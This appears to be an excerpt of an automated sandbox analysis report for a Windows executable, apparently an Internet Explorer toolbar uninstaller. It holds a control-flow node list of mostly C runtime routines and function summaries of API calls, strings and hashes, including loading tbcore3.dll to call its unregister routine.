3243->3244 3245 33259b 3244->3245 3362 332924 3245->3362 3252 3320f9 __decode_pointer 6 API calls 3253 3325ef 3252->3253 3253->3228 3254 3325f6 3253->3254 3382 3321e5 3254->3382 3256 3325fe GetCurrentThreadId 3256->3233 3727 33264c 3257->3727 3259 331dea GetStartupInfoA 3260 333730 __calloc_crt 66 API calls 3259->3260 3268 331e0b 3260->3268 3261 332029 __freefls@4 3261->3196 3262 331fa6 GetStdHandle 3267 331f70 3262->3267 3263 33200b SetHandleCount 3263->3261 3264 333730 __calloc_crt 66 API calls 3264->3268 3265 331fb8 GetFileType 3265->3267 3266 331ef3 3266->3261 3266->3267 3269 331f1c GetFileType 3266->3269 3271 33317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3266->3271 3267->3261 3267->3262 3267->3263 3267->3265 3270 33317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3267->3270 3268->3261 3268->3264 3268->3266 3268->3267 3269->3266 3270->3267 3271->3266 3273 331d92 3272->3273 3274 331d96 3272->3274 3273->3200 3276 3336eb __malloc_crt 66 API calls 3274->3276 3277 331db7 3276->3277 3278 331dbe FreeEnvironmentStringsW 3277->3278 3728 3337f0 3277->3728 3278->3200 3282 331d08 _wparse_cmdline 3281->3282 3283 3311c7 3282->3283 3284 331d45 3282->3284 3283->3204 3283->3205 3285 3336eb __malloc_crt 66 API calls 3284->3285 3286 331d4b _wparse_cmdline 3285->3286 3286->3283 3288 331abc _wcslen 3287->3288 3292 3311d8 3287->3292 3289 333730 __calloc_crt 66 API calls 3288->3289 3295 331ae0 _wcslen 3289->3295 3290 331b45 3291 3335ee __freefls@4 66 API calls 3290->3291 3291->3292 3292->3208 3292->3209 3293 333730 __calloc_crt 66 API calls 3293->3295 3294 331b6b 3296 3335ee __freefls@4 66 API calls 3294->3296 3295->3290 3295->3292 3295->3293 3295->3294 3298 331b2a 3295->3298 3732 33367c 3295->3732 3296->3292 3298->3295 3299 332ae2 __invoke_watson 10 API calls 3298->3299 3299->3298 3301 3314de __IsNonwritableInCurrentImage 3300->3301 3741 332dc3 3301->3741 3303 3314fc __initterm_e 3305 33151b __IsNonwritableInCurrentImage __initterm 3303->3305 3745 332dac 3303->3745 3305->3211 3307 331035 GetCommandLineW CommandLineToArgvW 3306->3307 3308 33101f GetLastError 3306->3308 3310 331067 3307->3310 3311 331056 PathFileExistsW 3307->3311 3308->3307 3309 33102c 3308->3309 3309->3215 3313 331084 LoadLibraryW 3310->3313 3311->3310 3312 33106e PathFileExistsW 3311->3312 3312->3310 3312->3313 3314 331091 GetProcAddress 3313->3314 3315 3310aa CloseHandle CoUninitialize 3313->3315 3316 3310a3 FreeLibrary 3314->3316 3317 3310a1 3314->3317 3318 3310c2 3315->3318 3319 3310bb LocalFree 3315->3319 3316->3315 3317->3316 3318->3215 3319->3318 3846 331555 3320->3846 3322 331692 3322->3216 3324 3310e9 3323->3324 3325 3310ee 3323->3325 3326 3318c4 __FF_MSGBANNER 66 API calls 3324->3326 3327 331719 __NMSG_WRITE 66 API calls 3325->3327 3326->3325 3328 3310f6 3327->3328 3329 331465 _fast_error_exit 3 API calls 3328->3329 3330 331100 3329->3330 3330->3189 3332 3318c4 __FF_MSGBANNER 66 API calls 3331->3332 3333 33141b 3332->3333 3334 331719 __NMSG_WRITE 66 API calls 3333->3334 3335 331423 3334->3335 3336 3320f9 __decode_pointer 6 API calls 3335->3336 3337 3311ad 3336->3337 3337->3197 3339 331555 _doexit 66 API calls 3338->3339 3340 3316b8 3339->3340 3340->3219 3342 3313ec Sleep GetModuleHandleW 3341->3342 3343 33140a 3342->3343 3344 33140e 3342->3344 3343->3342 3343->3344 3344->3225 3411 3320f0 3345->3411 3347 3316d3 __init_pointers __initp_misc_winsig 3414 332913 3347->3414 3350 33207e __encode_pointer 6 API calls 3351 33170f 3350->3351 3352 33207e TlsGetValue 3351->3352 3353 3320b7 GetModuleHandleW 3352->3353 3354 332096 3352->3354 3355 3320d2 GetProcAddress 3353->3355 3356 3320c7 3353->3356 3354->3353 3357 3320a0 TlsGetValue 3354->3357 3359 3320af 3355->3359 3358 3313e1 __crt_waiting_on_module_handle 2 API calls 3356->3358 3361 3320ab 3357->3361 3360 3320cd 3358->3360 3359->3240 3360->3355 3360->3359 3361->3353 3361->3359 3363 33292f 3362->3363 3365 3325a8 3363->3365 3417 33317c 3363->3417 3365->3228 3366 3320f9 TlsGetValue 3365->3366 3367 332132 GetModuleHandleW 3366->3367 3368 332111 3366->3368 3369 332142 3367->3369 3370 33214d GetProcAddress 3367->3370 3368->3367 3371 33211b TlsGetValue 3368->3371 3372 3313e1 __crt_waiting_on_module_handle 2 API calls 3369->3372 3374 33212a 3370->3374 3375 332126 3371->3375 3373 332148 3372->3373 3373->3370 3373->3374 3374->3228 3376 333730 3374->3376 3375->3367 3375->3374 3378 333739 3376->3378 3379 3325d5 3378->3379 3380 333757 Sleep 3378->3380 3422 33557f 3378->3422 3379->3228 3379->3252 3381 33376c 3380->3381 3381->3378 3381->3379 3706 33264c 3382->3706 3384 3321f1 GetModuleHandleW 3385 332201 3384->3385 3386 332207 3384->3386 3387 3313e1 __crt_waiting_on_module_handle 2 API calls 3385->3387 3388 332243 3386->3388 3389 33221f GetProcAddress GetProcAddress 3386->3389 3387->3386 3390 332aa0 __lock 62 API calls 3388->3390 3389->3388 3391 332262 InterlockedIncrement 3390->3391 3707 3322ba 3391->3707 3394 332aa0 __lock 62 API calls 3395 332283 3394->3395 3710 333c9e InterlockedIncrement 3395->3710 3397 3322a1 3722 3322c3 3397->3722 3399 3322ae __freefls@4 3399->3256 3401 3321b2 3400->3401 3402 3321be 3400->3402 3403 3320f9 __decode_pointer 6 API calls 3401->3403 3404 3321d2 TlsFree 3402->3404 3405 3321e0 3402->3405 3403->3402 3404->3405 3406 3329a3 3405->3406 3407 33298b DeleteCriticalSection 3405->3407 3409 3329b5 DeleteCriticalSection 3406->3409 3410 3329c3 3406->3410 3408 3335ee __freefls@4 66 API calls 3407->3408 3408->3405 3409->3406 3410->3233 3412 33207e __encode_pointer 6 API calls 3411->3412 3413 3320f7 3412->3413 3413->3347 3415 33207e __encode_pointer 6 API calls 3414->3415 3416 331705 3415->3416 3416->3350 3421 33264c 3417->3421 3419 333188 InitializeCriticalSectionAndSpinCount 3420 3331cc __freefls@4 3419->3420 3420->3363 3421->3419 3423 33558b __freefls@4 3422->3423 3424 3355c2 __crtGetStringTypeA_stat 3423->3424 3425 3355a3 3423->3425 3428 3355b8 __freefls@4 3424->3428 3430 335634 HeapAlloc 3424->3430 3441 332aa0 3424->3441 3448 334dc3 3424->3448 3454 33567b 3424->3454 3457 3331eb 3424->3457 3435 332c72 3425->3435 3428->3378 3430->3424 3460 3322cc GetLastError 3435->3460 3437 332c77 3438 332c0a 3437->3438 3439 3320f9 __decode_pointer 6 API calls 3438->3439 3440 332c1a __invoke_watson 3439->3440 3442 332ab5 3441->3442 3443 332ac8 EnterCriticalSection 3441->3443 3502 3329dd 3442->3502 3443->3424 3445 332abb 3445->3443 3446 331411 __amsg_exit 65 API calls 3445->3446 3447 332ac7 3446->3447 3447->3443 3450 334df1 3448->3450 3449 334e8a 3453 334e93 3449->3453 3701 3349da 3449->3701 3450->3449 3450->3453 3694 33492a 3450->3694 3453->3424 3705 3329c6 LeaveCriticalSection 3454->3705 3456 335682 3456->3424 3458 3320f9 __decode_pointer 6 API calls 3457->3458 3459 3331fb 3458->3459 3459->3424 3474 332174 TlsGetValue 3460->3474 3463 332339 SetLastError 3463->3437 3464 333730 __calloc_crt 63 API calls 3465 3322f7 3464->3465 3465->3463 3466 3320f9 __decode_pointer 6 API calls 3465->3466 3467 332311 3466->3467 3468 332330 3467->3468 3469 332318 3467->3469 3479 3335ee 3468->3479 3470 3321e5 __mtinit 63 API calls 3469->3470 3472 332320 GetCurrentThreadId 3470->3472 3472->3463 3473 332336 3473->3463 3475 3321a4 3474->3475 3476 332189 3474->3476 3475->3463 3475->3464 3477 3320f9 __decode_pointer 6 API calls 3476->3477 3478 332194 TlsSetValue 3477->3478 3478->3475 3481 3335fa __freefls@4 3479->3481 3480 333673 _realloc __freefls@4 3480->3473 3481->3480 3483 332aa0 __lock 64 API calls 3481->3483 3491 333639 3481->3491 3482 33364e HeapFree 3482->3480 3484 333660 3482->3484 3487 333611 ___sbh_find_block 3483->3487 3485 332c72 __mtinitlocknum 64 API calls 3484->3485 3486 333665 GetLastError 3485->3486 3486->3480 3488 33362b 3487->3488 3492 334614 3487->3492 3498 333644 3488->3498 3491->3480 3491->3482 3493 334653 3492->3493 3497 3348f5 ___sbh_free_block 3492->3497 3494 33483f VirtualFree 3493->3494 3493->3497 3495 3348a3 3494->3495 3496 3348b2 VirtualFree HeapFree 3495->3496 3495->3497 3496->3497 3497->3488 3501 3329c6 LeaveCriticalSection 3498->3501 3500 33364b 3500->3491 3501->3500 3503 3329e9 __freefls@4 3502->3503 3504 332a0f 3503->3504 3528 3318c4 3503->3528 3512 332a1f __freefls@4 3504->3512 3574 3336eb 3504->3574 3510 332a31 3514 332c72 __mtinitlocknum 66 API calls 3510->3514 3511 332a40 3515 332aa0 __lock 66 API calls 3511->3515 3512->3445 3514->3512 3517 332a47 3515->3517 3518 332a7b 3517->3518 3519 332a4f 3517->3519 3520 3335ee __freefls@4 66 API calls 3518->3520 3521 33317c __mtinitlocknum InitializeCriticalSectionAndSpinCount 3519->3521 3522 332a6c 3520->3522 3523 332a5a 3521->3523 3579 332a97 3522->3579 3523->3522 3525 3335ee __freefls@4 66 API calls 3523->3525 3526 332a66 3525->3526 3527 332c72 __mtinitlocknum 66 API calls 3526->3527 3527->3522 3582 3335a3 3528->3582 3531 3335a3 __set_error_mode 66 API calls 3533 3318d8 3531->3533 3532 331719 __NMSG_WRITE 66 API calls 3534 3318f0 3532->3534 3533->3532 3535 3318fa 3533->3535 3536 331719 __NMSG_WRITE 66 API calls 3534->3536 3537 331719 3535->3537 3536->3535 3538 33172d 3537->3538 3539 3335a3 __set_error_mode 63 API calls 3538->3539 3570 331888 3538->3570 3540 33174f 3539->3540 3541 33188d GetStdHandle 3540->3541 3543 3335a3 __set_error_mode 63 API calls 3540->3543 3542 33189b _strlen 3541->3542 3541->3570 3546 3318b4 WriteFile 3542->3546 3542->3570 3544 331760 3543->3544 3544->3541 3545 331772 3544->3545 3545->3570 3588 33353b 3545->3588 3546->3570 3549 3317a8 GetModuleFileNameA 3550 3317c6 3549->3550 3557 3317e9 _strlen 3549->3557 3552 33353b _strcpy_s 63 API calls 3550->3552 3554 3317d6 3552->3554 3555 332ae2 __invoke_watson 10 API calls 3554->3555 3554->3557 3555->3557 3566 33182c 3557->3566 3604 3333f0 3557->3604 3560 331850 3563 33337c _strcat_s 63 API calls 3560->3563 3562 332ae2 __invoke_watson 10 API calls 3562->3560 3565 331864 3563->3565 3564 332ae2 __invoke_watson 10 API calls 3564->3566 3567 331875 3565->3567 3569 332ae2 __invoke_watson 10 API calls 3565->3569 3613 33337c 3566->3613 3622 333213 3567->3622 3569->3567 3571 331465 3570->3571 3660 33143a GetModuleHandleW 3571->3660 3576 3336f4 3574->3576 3577 332a2a 3576->3577 3578 33370b Sleep 3576->3578 3664 3354b5 3576->3664 3577->3510 3577->3511 3578->3576 3693 3329c6 LeaveCriticalSection 3579->3693 3581 332a9e 3581->3512 3583 3335b2 3582->3583 3584 332c72 __mtinitlocknum 66 API calls 3583->3584 3587 3318cb 3583->3587 3585 3335d5 3584->3585 3586 332c0a __calloc_impl 6 API calls 3585->3586 3586->3587 3587->3531 3587->3533 3589 333553 3588->3589 3590 33354c 3588->3590 3591 332c72 __mtinitlocknum 66 API calls 3589->3591 3590->3589 3593 333579 3590->3593 3596 333558 3591->3596 3592 332c0a __calloc_impl 6 API calls 3594 331794 3592->3594 3593->3594 3595 332c72 __mtinitlocknum 66 API calls 3593->3595 3594->3549 3597 332ae2 3594->3597 3595->3596 3596->3592 3649 335320 3597->3649 3599 332b0f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 3600 332beb GetCurrentProcess TerminateProcess 3599->3600 3601 332bdf __invoke_watson 3599->3601 3651 3310cc 3600->3651 3601->3600 3603 3317a5 3603->3549 3607 333402 3604->3607 3605 333406 3606 332c72 __mtinitlocknum 66 API calls 3605->3606 3608 331819 3605->3608 3612 333422 3606->3612 3607->3605 3607->3608 3610 33344c 3607->3610 3608->3564 3608->3566 3609 332c0a __calloc_impl 6 API calls 3609->3608 3610->3608 3611 332c72 __mtinitlocknum 66 API calls 3610->3611 3611->3612 3612->3609 3614 333394 3613->3614 3617 33338d 3613->3617 3615 332c72 __mtinitlocknum 66 API calls 3614->3615 3616 333399 3615->3616 3618 332c0a __calloc_impl 6 API calls 3616->3618 3617->3614 3619 3333c8 3617->3619 3620 33183f 3618->3620 3619->3620 3621 332c72 __mtinitlocknum 66 API calls 3619->3621 3620->3560 3620->3562 3621->3616 3623 3320f0 __init_pointers 6 API calls 3622->3623 3624 333223 3623->3624 3625 333236 LoadLibraryA 3624->3625 3629 3332be 3624->3629 3627 333360 3625->3627 3628 33324b GetProcAddress 3625->3628 3626 3332e8 3632 3320f9 __decode_pointer 6 API calls 3626->3632 3646 333313 3626->3646 3627->3570 3628->3627 3630 333261 3628->3630 3629->3626 3633 3320f9 __decode_pointer 6 API calls 3629->3633 3634 33207e __encode_pointer 6 API calls 3630->3634 3631 3320f9 __decode_pointer 6 API calls 3631->3627 3642 33332b 3632->3642 3635 3332db 3633->3635 3636 333267 GetProcAddress 3634->3636 3637 3320f9 __decode_pointer 6 API calls 3635->3637 3638 33207e __encode_pointer 6 API calls 3636->3638 3637->3626 3639 33327c GetProcAddress 3638->3639 3640 33207e __encode_pointer 6 API calls 3639->3640 3641 333291 GetProcAddress 3640->3641 3643 33207e __encode_pointer 6 API calls 3641->3643 3644 3320f9 __decode_pointer 6 API calls 3642->3644 3642->3646 3645 3332a6 3643->3645 3644->3646 3645->3629 3647 3332b0 GetProcAddress 3645->3647 3646->3631 3648 33207e __encode_pointer 6 API calls 3647->3648 3648->3629 3650 33532c __VEC_memzero 3649->3650 3650->3599 3652 3310d6 IsDebuggerPresent 3651->3652 3653 3310d4 3651->3653 3659 3328d2 3652->3659 3653->3603 3656 331358 SetUnhandledExceptionFilter UnhandledExceptionFilter 3657 331375 __invoke_watson 3656->3657 3658 33137d GetCurrentProcess TerminateProcess 3656->3658 3657->3658 3658->3603 3659->3656 3661 331463 ExitProcess 3660->3661 3662 33144e GetProcAddress 3660->3662 3662->3661 3663 33145e 3662->3663 3663->3661 3665 335568 3664->3665 3674 3354c7 3664->3674 3666 3331eb __calloc_impl 6 API calls 3665->3666 3667 33556e 3666->3667 3668 332c72 __mtinitlocknum 65 API calls 3667->3668 3680 335560 3668->3680 3669 3318c4 __FF_MSGBANNER 65 API calls 3669->3674 3670 331719 __NMSG_WRITE 65 API calls 3670->3674 3672 335524 HeapAlloc 3672->3674 3673 331465 _fast_error_exit 3 API calls 3673->3674 3674->3669 3674->3670 3674->3672 3674->3673 3675 335554 3674->3675 3676 3331eb __calloc_impl 6 API calls 3674->3676 3678 335559 3674->3678 3674->3680 3681 335466 3674->3681 3677 332c72 __mtinitlocknum 65 API calls 3675->3677 3676->3674 3677->3678 3679 332c72 __mtinitlocknum 65 API calls 3678->3679 3679->3680 3680->3576 3682 335472 __freefls@4 3681->3682 3683 3354a3 __freefls@4 3682->3683 3684 332aa0 __lock 66 API calls 3682->3684 3683->3674 3685 335488 3684->3685 3686 334dc3 ___sbh_alloc_block 5 API calls 3685->3686 3687 335493 3686->3687 3689 3354ac 3687->3689 3692 3329c6 LeaveCriticalSection 3689->3692 3691 3354b3 3691->3683 3692->3691 3693->3581 3695 334971 HeapAlloc 3694->3695 3696 33493d HeapReAlloc 3694->3696 3698 334994 VirtualAlloc 3695->3698 3699 33495b 3695->3699 3697 33495f 3696->3697 3696->3699 3697->3695 3698->3699 3700 3349ae HeapFree 3698->3700 3699->3449 3700->3699 3702 3349f1 VirtualAlloc 3701->3702 3704 334a38 3702->3704 3704->3453 3705->3456 3706->3384 3725 3329c6 LeaveCriticalSection 3707->3725 3709 33227c 3709->3394 3711 333cbf 3710->3711 3712 333cbc InterlockedIncrement 3710->3712 3713 333cc9 InterlockedIncrement 3711->3713 3714 333ccc 3711->3714 3712->3711 3713->3714 3715 333cd6 InterlockedIncrement 3714->3715 3716 333cd9 3714->3716 3715->3716 3717 333ce3 InterlockedIncrement 3716->3717 3719 333ce6 3716->3719 3717->3719 3718 333cff InterlockedIncrement 3718->3719 3719->3718 3720 333d1a InterlockedIncrement 3719->3720 3721 333d0f InterlockedIncrement 3719->3721 3720->3397 3721->3719 3726 3329c6 LeaveCriticalSection 3722->3726 3724 3322ca 3724->3399 3725->3709 3726->3724 3727->3259 3729 333808 3728->3729 3730 33382f __VEC_memcpy 3729->3730 3731 331dd3 3729->3731 3730->3731 3731->3278 3733 333694 3732->3733 3734 33368d 3732->3734 3735 332c72 __mtinitlocknum 66 API calls 3733->3735 3734->3733 3736 3336c0 3734->3736 3740 333699 3735->3740 3738 3336a8 3736->3738 3739 332c72 __mtinitlocknum 66 API calls 3736->3739 3737 332c0a __calloc_impl 6 API calls 3737->3738 3738->3295 3739->3740 3740->3737 3742 332dc9 3741->3742 3743 33207e __encode_pointer 6 API calls 3742->3743 3744 332de1 3742->3744 3743->3742 3744->3303 3748 332d70 3745->3748 3747 332db9 3747->3305 3749 332d7c __freefls@4 3748->3749 3756 33147d 3749->3756 3755 332d9d __freefls@4 3755->3747 3757 332aa0 __lock 66 API calls 3756->3757 3758 331484 3757->3758 3759 332c85 3758->3759 3760 3320f9 __decode_pointer 6 API calls 3759->3760 3761 332c99 3760->3761 3762 3320f9 __decode_pointer 6 API calls 3761->3762 3763 332ca9 3762->3763 3764 332d2c 3763->3764 3779 33539a 3763->3779 3776 332da6 3764->3776 3766 332d13 3767 33207e __encode_pointer 6 API calls 3766->3767 3768 332d21 3767->3768 3772 33207e __encode_pointer 6 API calls 3768->3772 3769 332cc7 3769->3766 3770 332ceb 3769->3770 3792 33377c 3769->3792 3770->3764 3773 33377c __realloc_crt 73 API calls 3770->3773 3774 332d01 3770->3774 3772->3764 3773->3774 3774->3764 3775 33207e __encode_pointer 6 API calls 3774->3775 3775->3766 3842 331486 3776->3842 3780 3353a6 __freefls@4 3779->3780 3781 3353d3 3780->3781 3782 3353b6 3780->3782 3783 335414 HeapSize 3781->3783 3785 332aa0 __lock 66 API calls 3781->3785 3784 332c72 __mtinitlocknum 66 API calls 3782->3784 3788 3353cb __freefls@4 3783->3788 3786 3353bb 3784->3786 3789 3353e3 ___sbh_find_block 3785->3789 3787 332c0a __calloc_impl 6 API calls 3786->3787 3787->3788 3788->3769 3797 335434 3789->3797 3796 333785 3792->3796 3794 3337c4 3794->3770 3795 3337a5 Sleep 3795->3796 3796->3794 3796->3795 3801 33569d 3796->3801 3800 3329c6 LeaveCriticalSection 3797->3800 3799 33540f 3799->3783 3799->3788 3800->3799 3802 3356a9 __freefls@4 3801->3802 3803 3356b0 3802->3803 3804 3356be 3802->3804 3805 3354b5 _malloc 66 API calls 3803->3805 3806 3356d1 3804->3806 3807 3356c5 3804->3807 3828 3356b8 _realloc __freefls@4 3805->3828 3813 335843 3806->3813 3825 3356de ___sbh_resize_block ___sbh_find_block 3806->3825 3808 3335ee __freefls@4 66 API calls 3807->3808 3808->3828 3809 335876 3811 3331eb __calloc_impl 6 API calls 3809->3811 3810 335848 HeapReAlloc 3810->3813 3810->3828 3814 33587c 3811->3814 3812 332aa0 __lock 66 API calls 3812->3825 3813->3809 3813->3810 3816 33589a 3813->3816 3817 3331eb __calloc_impl 6 API calls 3813->3817 3819 335890 3813->3819 3815 332c72 __mtinitlocknum 66 API calls 3814->3815 3815->3828 3818 332c72 __mtinitlocknum 66 API calls 3816->3818 3816->3828 3817->3813 3820 3358a3 GetLastError 3818->3820 3822 332c72 __mtinitlocknum 66 API calls 3819->3822 3820->3828 3837 335811 3822->3837 3823 335769 HeapAlloc 3823->3825 3824 3357be HeapReAlloc 3824->3825 3825->3809 3825->3812 3825->3823 3825->3824 3827 334dc3 ___sbh_alloc_block 5 API calls 3825->3827 3825->3828 3829 335829 3825->3829 3830 3331eb __calloc_impl 6 API calls 3825->3830 3832 334614 VirtualFree VirtualFree HeapFree ___sbh_free_block 3825->3832 3834 33580c 3825->3834 3835 3337f0 __VEC_memcpy _realloc 3825->3835 3838 3357e1 3825->3838 3826 335816 GetLastError 3826->3828 3827->3825 3828->3796 3829->3828 3831 332c72 __mtinitlocknum 66 API calls 3829->3831 3830->3825 3833 335836 3831->3833 3832->3825 3833->3820 3833->3828 3836 332c72 __mtinitlocknum 66 API calls 3834->3836 3835->3825 3836->3837 3837->3826 3837->3828 3841 3329c6 LeaveCriticalSection 3838->3841 3840 3357e8 3840->3825 3841->3840 3845 3329c6 LeaveCriticalSection 3842->3845 3844 33148d 3844->3755 3845->3844 3847 331561 __freefls@4 3846->3847 3848 332aa0 __lock 66 API calls 3847->3848 3849 331568 3848->3849 3850 331631 __initterm 3849->3850 3852 331594 3849->3852 3865 33166c 3850->3865 3854 3320f9 __decode_pointer 6 API calls 3852->3854 3856 33159f 3854->3856 3855 331669 __freefls@4 3855->3322 3858 331621 __initterm 3856->3858 3860 3320f9 __decode_pointer 6 API calls 3856->3860 3858->3850 3859 331660 3861 331465 _fast_error_exit 3 API calls 3859->3861 3864 3315b4 3860->3864 3861->3855 3862 3320f9 6 API calls __decode_pointer 3862->3864 3863 3320f0 6 API calls __init_pointers 3863->3864 3864->3858 3864->3862 3864->3863 3866 331672 3865->3866 3867 33164d 3865->3867 3870 3329c6 LeaveCriticalSection 3866->3870 3867->3855 3869 3329c6 LeaveCriticalSection 3867->3869 3869->3859 3870->3867 4423 3367c8 RtlUnwind 3903 33122e 3906 3318fe 3903->3906 3907 3322cc __getptd_noexit 66 API calls 3906->3907 3908 33123f 3907->3908 3975 33458d 3978 3329c6 LeaveCriticalSection 3975->3978 3977 334594 3978->3977

                                                                                  Executed Functions

                                                                                  Function 00331000 Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 73libraryloadersynchronizationCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 00331006
                                                                                  • CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00331013
                                                                                  • GetLastError.KERNEL32 ref: 0033101F
                                                                                  • GetCommandLineW.KERNEL32(?), ref: 00331040
                                                                                  • CommandLineToArgvW.SHELL32(00000000), ref: 00331047
                                                                                  • PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00331061
                                                                                  • PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00331073
                                                                                  • LoadLibraryW.KERNELBASE(?), ref: 00331085
                                                                                  • GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00331097
                                                                                  • FreeLibrary.KERNELBASE(00000000), ref: 003310A4
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 003310AB
                                                                                  • CoUninitialize.COMBASE ref: 003310B1
                                                                                  • LocalFree.KERNEL32(00000000), ref: 003310BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
                                                                                  • String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll$^t
                                                                                  • API String ID: 474438367-1096769585
                                                                                  • Opcode ID: c07432168f99451d40f445f800f228eee04822e782fd6da1c199b58965b5512e
                                                                                  • Instruction ID: 81e3c89d2116ea4b001f3d0112674d06337130ef4c165f1a76143889fc6e7a91
                                                                                  • Opcode Fuzzy Hash: c07432168f99451d40f445f800f228eee04822e782fd6da1c199b58965b5512e
                                                                                  • Instruction Fuzzy Hash: 0011E676605755FB832BABA0ACC8A9F379CFE44762F010926F542D2050CFA58D45C7F2
                                                                                  Function 00331465 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 16 331465-331476 call 33143a ExitProcess
                                                                                  APIs
                                                                                  • ___crtCorExitProcess.LIBCMT ref: 0033146D
                                                                                    • Part of subcall function 0033143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00331472,?,?,003354EE,000000FF,0000001E,?,003336FC,?,00000001,?,?,00332A2A,00000018), ref: 00331444
                                                                                    • Part of subcall function 0033143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00331454
                                                                                  • ExitProcess.KERNEL32 ref: 00331476
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                  • String ID:
                                                                                  • API String ID: 2427264223-0
                                                                                  • Opcode ID: 7068141d0c7aa3c6e3056678b9b92b43d74e0e14c0133176ea927c0713d76ab4
                                                                                  • Instruction ID: c89967b65f83e6bcdc0097aca85042fd2123d64a991101eca6ac30e51b1de863
                                                                                  • Opcode Fuzzy Hash: 7068141d0c7aa3c6e3056678b9b92b43d74e0e14c0133176ea927c0713d76ab4
                                                                                  • Instruction Fuzzy Hash: C3B09231004208BBDB072F12DC4A84D3F2AFB803A0FA08420F80849031DF72ADA29A90
                                                                                  Function 0033261B Relevance: 1.5, APIs: 1, Instructions: 20memoryCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 19 33261b-33263d HeapCreate 20 332641-33264a 19->20 21 33263f-332640 19->21
                                                                                  APIs
                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00332630
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000028.00000002.3042096501.0000000000331000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00330000, based on PE: true
                                                                                  • Associated: 00000028.00000002.3042054917.0000000000330000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042146850.0000000000338000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042212893.000000000033A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000028.00000002.3042250210.000000000033C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_40_2_330000_bmaosk.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateHeap
                                                                                  • String ID:
                                                                                  • API String ID: 10892065-0
                                                                                  • Opcode ID: 94f9a04be0bc5e4688769e99ac15b8314f03f21970aa9c6fdb36b49c0fd7c5b1
                                                                                  • Instruction ID: c6ad7125590ddf053872839fb8c3c588eb367333d225dfd6592f4b24c0b11812
                                                                                  • Opcode Fuzzy Hash: 94f9a04be0bc5e4688769e99ac15b8314f03f21970aa9c6fdb36b49c0fd7c5b1
                                                                                  • Instruction Fuzzy Hash: 43D0A7325543446EDB029F727CC97223BDCD784795F108435BA0CC6161F670C591CB04
                                                                                  Function 00331681 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 22 331681-33168d call 331555 24 331692-331696 22->24
                                                                                  APIs
                                                                                  • _doexit.LIBCMT ref: 0033168D
                                                                                    • Part of subcall function 00331555: __lock.LIBCMT ref: 00331563
                                                                                    • Part of subcall function 00331555: __decode_pointer.LIBCMT ref: 0033159A
                                                                                    • Part of subcall function 00331555: __decode_pointer.LIBCMT ref: 003315AF
                                                                                    • Part of subcall function 00331555: __decode_pointer.LIBCMT ref: 003315D9
                                                                                    • Part of subcall function 00331555: __decode_pointer.LIBCMT ref: 003315EF
                                                                                    • Part of subcall function 00331555: __decode_pointer.LIBCMT ref: 003315FC
                                                                                    • Part of subcall function 00331555: __initterm.LIBCMT ref: 0033162B
                                                                                    • Part of subcall function 00331555: __initterm.LIBCMT ref: 0033163B
                                                                                  Memory Dump Source
